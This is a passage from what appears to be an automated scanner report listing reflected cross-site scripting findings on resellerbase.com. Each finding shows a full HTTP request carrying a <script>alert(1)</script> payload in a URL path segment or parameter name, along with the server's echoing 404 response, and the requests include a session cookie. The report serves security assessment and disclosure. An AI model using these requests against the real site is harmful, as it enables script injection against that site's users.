Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/images/rating4efdf<script>alert(1)</script>8be84185e6c/0.gif was not found on this server.</p>
...[SNIP]...

2.1958. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d9060<script>alert(1)</script>02c5a0c9c4c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/images/rating/0.gifd9060<script>alert(1)</script>02c5a0c9c4c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/images/rating/0.gifd9060<script>alert(1)</script>02c5a0c9c4c was not found on this server.</p>
...[SNIP]...

2.1959. http://www.resellerbase.com/detail/26/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7368<script>alert(1)</script>5c21dbcceae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/26/themes/kosmos/images/rating/0.gif?d7368<script>alert(1)</script>5c21dbcceae=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/26/themes/kosmos/images/rating/0.gif?d7368<script>alert(1)</script>5c21dbcceae=1 was not found on this server.</p>
...[SNIP]...

2.1960. http://www.resellerbase.com/detail/28/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54a3b<script>alert(1)</script>8d1b654accb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail54a3b<script>alert(1)</script>8d1b654accb/28/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54a3b<script>alert(1)</script>8d1b654accb/28/ was not found on this server.</p>
...[SNIP]...

2.1961. http://www.resellerbase.com/detail/28/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf44f<script>alert(1)</script>352cda2cde0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28bf44f<script>alert(1)</script>352cda2cde0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28bf44f<script>alert(1)</script>352cda2cde0/ was not found on this server.</p>
...[SNIP]...

2.1962. http://www.resellerbase.com/detail/28/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d597<script>alert(1)</script>8c088807896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/?9d597<script>alert(1)</script>8c088807896=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/?9d597<script>alert(1)</script>8c088807896=1 was not found on this server.</p>
...[SNIP]...

2.1963. http://www.resellerbase.com/detail/28/nicline-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/nicline-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d9a5<script>alert(1)</script>5f0041c7d83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3d9a5<script>alert(1)</script>5f0041c7d83/28/nicline-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3d9a5<script>alert(1)</script>5f0041c7d83/28/nicline-com.html was not found on this server.</p>
...[SNIP]...

2.1964. http://www.resellerbase.com/detail/28/nicline-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/28/nicline-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b78a<a>4dd4618a620 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/286b78a<a>4dd4618a620/nicline-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/286b78a<a>4dd4618a620/nicline-com.html was not found on this server.</p>
...[SNIP]...

2.1965. http://www.resellerbase.com/detail/28/nicline-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/nicline-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65377<script>alert(1)</script>0cb4fb1db9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/65377<script>alert(1)</script>0cb4fb1db9d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:28:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/65377<script>alert(1)</script>0cb4fb1db9d was not found on this server.</p>
...[SNIP]...

2.1966. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8d8d<script>alert(1)</script>014b2c04e2e9b2483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaila8d8d<script>alert(1)</script>014b2c04e2e9b2483/28/rating.php?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila8d8d<script>alert(1)</script>014b2c04e2e9b2483/28/rating.php?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1967. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd299<script>alert(1)</script>835f774f4c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailcd299<script>alert(1)</script>835f774f4c3/28/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailcd299<script>alert(1)</script>835f774f4c3/28/rating.php was not found on this server.</p>
...[SNIP]...

2.1968. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29159<script>alert(1)</script>bcc52dba6b62a2a89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/2829159<script>alert(1)</script>bcc52dba6b62a2a89/rating.php?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2829159<script>alert(1)</script>bcc52dba6b62a2a89/rating.php?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1969. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfb25<script>alert(1)</script>50d05b939c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28dfb25<script>alert(1)</script>50d05b939c4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28dfb25<script>alert(1)</script>50d05b939c4/rating.php was not found on this server.</p>
...[SNIP]...

2.1970. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74014<script>alert(1)</script>1d3c0036461157098 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/28/rating.php74014<script>alert(1)</script>1d3c0036461157098?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.php74014<script>alert(1)</script>1d3c0036461157098?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1971. http://www.resellerbase.com/detail/28/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d4d81<script>alert(1)</script>6bcac2db194 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/rating.phpd4d81<script>alert(1)</script>6bcac2db194 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.phpd4d81<script>alert(1)</script>6bcac2db194 was not found on this server.</p>
...[SNIP]...

2.1972. http://www.resellerbase.com/detail/28/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b02a3<script>alert(1)</script>ab4691f89ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/rating.php?b02a3<script>alert(1)</script>ab4691f89ea=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.php?b02a3<script>alert(1)</script>ab4691f89ea=1 was not found on this server.</p>
...[SNIP]...

2.1973. http://www.resellerbase.com/detail/28/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2831e<script>alert(1)</script>597f0290e93a2283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/28/rating.php/2831e<script>alert(1)</script>597f0290e93a2283?id=28&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/rating.php/2831e<script>alert(1)</script>597f0290e93a2283?id=28&rating=5 was not found on this server.</p>
...[SNIP]...

2.1974. http://www.resellerbase.com/detail/28/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c81f<script>alert(1)</script>2617603a5d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4c81f<script>alert(1)</script>2617603a5d5/28/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4c81f<script>alert(1)</script>2617603a5d5/28/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1975. http://www.resellerbase.com/detail/28/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b981f<script>alert(1)</script>01006970906 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28b981f<script>alert(1)</script>01006970906/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28b981f<script>alert(1)</script>01006970906/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1976. http://www.resellerbase.com/detail/28/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5eb40<script>alert(1)</script>edf7bbccfce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/search.php5eb40<script>alert(1)</script>edf7bbccfce?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

